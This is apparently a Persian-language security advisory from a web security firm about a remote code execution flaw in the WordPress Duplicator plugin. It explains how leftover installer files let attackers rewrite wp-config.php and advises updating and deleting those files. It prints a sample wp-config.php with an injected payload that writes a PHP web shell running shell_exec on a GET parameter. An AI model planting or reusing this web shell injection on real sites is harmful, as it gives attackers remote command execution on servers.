باگ پلاگین Duplicator

طی ۲ ماه گذشته وردپرس دوران خوبی را در حوزه امنیت نداشته است و مشکلات امنیتی سطح بالا و حیاتی در هسته وردپرس بوده است .

که از این طریق به هکر امکان اجرای کدها و دستورات مخرب بر علیه سایت های وردپرسی فراهم می کند .این ماه نیز خبرهای خوبی از وردپرس به گوش نمیرسد . متاسفانه اسیب پذیری اخیرا در Duplicator وردپرسی باعث شده  است که امکان دسترسی اجرای کد از راه دور به هکر را میدهد و هکر در این حالت یکی از شایع ترین اقداماتی که هکر میکند اضافه کردن کد های مخرب به فایل wp-config.php می باشد و یا یکی از اقدامات دیگر حدف فایل wp-config.php بوده است . که با این کار صفحه نصب وردپرس نمایش داده می شود  و یا  وب سایت با صفحه سفید نمایش داده می شود.  آسیب پذیری ذکر شده در نسخه ۱٫۲٫۴۲ و نسخه های پایین تر وجود دارد.

پلاگین duplicator که تاکنون بیش از ۱۰ میلیون نصب داشته است و جز پلاگین های پرکاربرد می باشد و عمدتا وب مستران برای کپی کردن یک وب سایت به وب سایت دیگر استفاده می شود که این تعداد نصب نشان از اهمیت این مشکل امنیتی برای وب مستران می باشد و باید هرچه زود تر نسبت به بروز رسانی پلاگین مربوطه اقدام کنند.

 

اقدامات جدید روی ورژن جدید

FIXES
– Plugin: Remove Google plus social icon
– Plugin: Translation Language file updates
– Plugin: Display a correct error message for memory error on package creation
– Plugin: Timezone related issue – Third Party plugin conflict
– Plugin: Fix Packages Detail Page – Make expanders sticky again
– Plugin: Won’t make full Archive
– Installer: 64-bit OS too large for 64-bit PHP
– Installer: Port Lite design pattern in Other parts of the LITE

 

آسیب پذیری در این پلاگین در سال ۲۰۱۷ نیز منتشر شده بود ولی چرا با گذشت بیش از یکسال بار دیگر نیز این مشکل رخ داده است .

پاسخ سوال در وجود فایل installer.php قدیمی در روت وب سایت شما می باشد که براساس وجود آسیب پذیری در نسخه های قبل بوده است که برای درک این موضوع تحلیل فنی ذیل را مطالعه نمایید.

تحلیل فنی :

همانطوری که میدانید پلاگین duplicator  از تمامی فایل ها ء پلاگین ها و قالب های وب سایت و بانک های اطلاعاتی وب سایت شما کپی تهیه کرده و در قالب یک فایل zip  پکیج نصبی را  برای انتقال به وب سایت دیگر و یا انتقال به سرور دیگر در اختیار شما قرار میدهد.

پکیح مربوطه دارای یک فایل به نام installer.php  می باشد و همچنین یک فایل به نام database.sql دارد که حاوی بانک اطلاعاتی وب سایت شما می باشد.

و زمانی که شما می خواهید از پلاگین مربوطه به جهت کپی گرفتن از وب سایت استفاده نمایید فایل های ذیل در روت اصلی وب سایت شما ذخیره می گردد.

database.php

installer.php

installer-backup.php

installer-data.sql

installer-log.txt

که مشکل امنیتی دقیقا در همین فایل ها وجود دارد که به هکر اجازه میدهد دوباره بسته نصبی را اجرا کند و تنظیمات وب سایت شما را ریست کنند و با ارسال درخواست های مخرب فایل wp-config.php شما را بازنویسی مجدد با محتویات مخرب نمایند.برای حل این مشکل پس از بروز رسانی پلاگین مربوطه بلافاصله فایل های ذکر شده را حذف نمایید. حذف فایل های مربوطه جز مهم ترین بخش پوشش این آسیب پذیری می باشد و بلافاصله باید فایل ها را حذف نمایید.

در ذیل فایل wp-config.php را خواهید دید که با کد های مخرب بازنویسی شده است.

 

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test
'); file_put_contents("test.php", '<pre><?php if
(isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>');
/
*
');
/** MySQL database username */
define('DB_USER', 'test');
/** MySQL database password */
define('DB_PASSWORD', 'test');
/** MySQL hostname */
define('DB_HOST', 'nowhere:12345');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 

این یکی از فایل هایی که هکر بازنویسی کرده است را مشاهده نمودید ولی متاسفانه هکر اقدام به قراردادن backdoor (درب پشتی) برای دسترسی های بعدی می نماید که شما لازم است که  فایل های مخرب را شناسایی و حذف نمایید و شناسایی این فایل ها کار بسیار دشواری می باشد .که می توانید این کار تخصصی رو به بخش امنیت شبکه کیاوا بسپارید.

برای استفاده از خدمات تخصصی امنیتی ما می توانید یک تیکت به بخش امنیت کیاوا ارسال نمایید.

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

20 + دوازده =

کیاوا

  • آدرس ایمیل : info@kiava.co
  • شماره تماس :‌ ۰۲۱۷۷۸۰۹۳۷۱
  • آدرس : شهر تهران، نارمک ، خیابان شهید روح اله کمیجانی (ارجمند) ، خیابان شهید محمود مهرانپور ، پلاک ۱۰ پاساژ بهمن ، طبقه همکف پلاک ۱۱